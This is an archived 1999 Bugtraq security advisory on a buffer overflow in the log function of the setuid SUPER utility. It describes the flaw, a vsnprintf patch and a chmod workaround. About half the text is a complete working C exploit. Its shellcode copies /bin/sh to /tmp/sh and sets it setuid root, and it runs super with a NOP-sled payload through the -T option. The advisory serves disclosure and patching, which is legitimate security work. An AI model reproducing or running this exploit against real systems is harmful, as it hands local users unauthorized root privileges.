a/super

Date:	Thu, 25 Feb 1999 01:43:37 -0300
From:	c0nd0r <root@SEKURE.ORG>
Subject:      SUPER buffer overflow
To:	BUGTRAQ@NETSPACE.ORG

 	           	    s e k u r e   S D I
                 	   http://www.sekure.org
                         -------------------------
                     Brazilian Information Security Team


                  -> SUPER's log function buffer overflow <-



1. Description

  We've seen a discussion weeks ago in the bugtraq mailing list about the
vulnerability found in the SUPER package which could lead to root
compromise. The author had released a patch and the problem was fixed in
the newest version.

  While perusing through the super 3.11.6, we've noticed another possible
buffer overflow condition if the syslog option is enabled (error.c):

  (Error() function)
  (..)
     if (error_syslog) {
        char newfmt[MAXPRINT], buf[MAXPRINT];
  (..)
        va_start(ap, fmt);
        (void) vsprintf(buf, newfmt, ap);
        va_end(ap);
  (..)

 MAXPRINT is 1300 bytes long.

 Error() function is used to return error messages which means it probably
 use a user supplied data as an argument (it does):

 (time.c)
 (...)
  return Error(0, 0, "%t\n\tInvalid time <%s>\n", str);
 (...)

 str is the string supplied by the -T option.

 As we can see, this bug is bit different from the one reported last week.
 I've noticed the 3.11.9 patchlevel is vulnerable to the problem, which
 might mean the newest version of super is vulnerable.


2.Consequences

  Local user may gain root privileges.


3. Recommendations

 Please, apply the patch below or remove the suid bit from the super
 binary (chmod u-s /usr/local/bin/super).

--- error.c	Thu Feb 25 00:38:25 1999
+++ error.patch.c	Thu Feb 25 01:07:53 1999
@@ -321,7 +321,7 @@
 	if (tag)
 	    StrLCat(newfmt, tag, sizeof(newfmt));
 	va_start(ap, fmt);
-	(void) vsprintf(buf, newfmt, ap);
+	(void) vsnprintf(buf, sizeof(buf), newfmt, ap);
 	va_end(ap);
 	SysLog(error_priority, buf);
     }
@@ -485,7 +485,7 @@
 	StrLCat(newfmt, fmt, sizeof(newfmt));
 	if (tag)
 	    StrLCat(newfmt, tag, sizeof(newfmt));
-	(void) vsprintf(buf, newfmt, ap);
+	(void) vsnprintf(buf, sizeof(buf), newfmt, ap);
 	va_end(ap);
 	SysLog(error_priority, buf);
     }


4. Exploit

  You will find the exploit for this issue in our page as well.
  http://ssc.sekure.org

--------------- SDI-super.c --------------------------------------
/*
 * [            Sekure SDI              ]
 * [    Brazilian Info Security Team    ]
 * | ---------------------------------- ]
 * |     SUPER exploit for linux        |
 * | ---------------------------------- |
 * |                                    |
 * |      http://ssc.sekure.org         |
 * |   Sekure SDI Secure Coding Team    |
 * |                                    |
 * | ---------------------------------- |
 * |   by c0nd0r <condor@sekure.org>    |
 * | ---------------------------------- |
 * [ thanks for the ppl at sekure.org:  ]
 * [ jamez(shellcode), bishop, dumped,  ]
 * [ bahamas, fcon, vader, yuckfoo.     ]
 *
 *
 * This will exploit a buffer overflow condition in the log section of
 * the SUPER program.
 *
 * It will create a suid bash owned by root at /tmp/sh.
 * (It'll defeat the debian bash-2.xx protection against rootshell)
 *
 * Note: The SUPER program must be compiled with the SYSLOG option.
 *
 * also thanks people from #uground (irc.brasnet.org network)
 *
 */

char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff"
        "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";


unsigned long getsp ( void) {
  __asm__("mov %esp,%eax");
}

main ( int argc, char *argv[] ) {
 char itamar[2040]; // ta mar mesmo
 long addr;
 int x, y, offset = 1000, align=0;

 if ( argc > 1) offset = atoi(argv[1]);

 addr = getsp() + offset;

 for ( x = 0; x < (1410-strlen(shellcode)); x++)
   itamar[x] = 0x90;

 for (  ; y < strlen(shellcode); x++, y++)
   itamar[x] = shellcode[y];

 for ( ; x < 1500; x+=4) {
  itamar[x  ] = (addr & 0xff000000) >> 24;
  itamar[x+1] = (addr & 0x000000ff);
  itamar[x+2] = (addr & 0x0000ff00) >> 8;
  itamar[x+3] = (addr & 0x00ff0000) >> 16;
 }

 itamar[x++] = '\0';
 printf ( "\nwargames at 0x%x, offset %d\n", addr, offset);
 printf ( "Look for a suid shell root owned at /tmp/sh\n");

 execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0);

}
---------------------- eof -----------------------------------------


5. Contacts


  Sekure SDI Advisory is a publication of Sekure SDI
  Brazilian Information Security Team
  http://www.sekure.org
  mailto:info@sekure.org

  This advisory has been written by Secure Coding Sekure SDI Group.
  http://ssc.sekure.org
  mailto:securecode@sekure.org

  Subscribe the "Best of Security Brasil" (bos-br) Mailing list
  http://bos.sekure.org (portuguese as the main language)
  mailto:bos-br-request@sekure.org


---
securecode@sekure.org
written by c0nd0r <condor@sekure.org>